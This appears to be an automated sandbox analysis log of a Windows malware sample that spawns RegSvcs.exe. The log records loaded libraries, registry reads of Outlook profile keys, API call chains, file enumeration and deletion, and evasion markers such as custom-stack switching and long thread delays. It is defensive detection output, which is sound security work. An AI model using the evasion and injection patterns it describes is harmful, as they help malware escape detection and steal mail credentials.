Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"	Jump to behavior

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C5JLkBS1CX.exe

Static file information: File size 1170432 > 1048576

Source: C5JLkBS1CX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: C5JLkBS1CX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: C5JLkBS1CX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: C5JLkBS1CX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C5JLkBS1CX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: C5JLkBS1CX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: C5JLkBS1CX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: C5JLkBS1CX.exe, 00000000.00000003.2152021291.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000000.00000003.2152153124.0000000003980000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2183296498.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2182170670.0000000003930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: C5JLkBS1CX.exe, 00000000.00000003.2152021291.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000000.00000003.2152153124.0000000003980000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2183296498.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, C5JLkBS1CX.exe, 00000003.00000003.2182170670.0000000003930000.00000004.00001000.00020000.00000000.sdmp

Source: C5JLkBS1CX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: C5JLkBS1CX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: C5JLkBS1CX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: C5JLkBS1CX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: C5JLkBS1CX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E4B37 LoadLibraryA,GetProcAddress,

0_2_005E4B37

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005EC4C6 push A3005EBAh; retn 005Eh	0_2_005EC50D
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00608945 push ecx; ret	0_2_00608958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041C40C push cs; iretd	4_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00423149 push eax; ret	4_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041C50E push cs; iretd	4_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004231C8 push eax; ret	4_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040E21D push ecx; ret	4_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041C6BE push ebx; ret	4_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698835E push es; iretd	4_2_06988364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0698B991 push es; ret	4_2_0698BA7C

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_005E48D7
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00665376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00665376

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00603187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00603187

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	API/Special instruction interceptor: Address: 118B08C
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	API/Special instruction interceptor: Address: 108EF84

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

4_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598997	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597904	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597790	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597399	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596712	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595498	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595277	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594078	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7712			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2134			Jump to behavior

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102252

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

API coverage: 4.6 %

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0064445A
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064C6D1 FindFirstFileW,FindClose,	0_2_0064C6D1
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0064C75C
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0064EF95
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0064F0F2
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0064F3F3
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006437EF
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00643B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00643B12
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0064BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0064BCBC

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005E49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598997	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
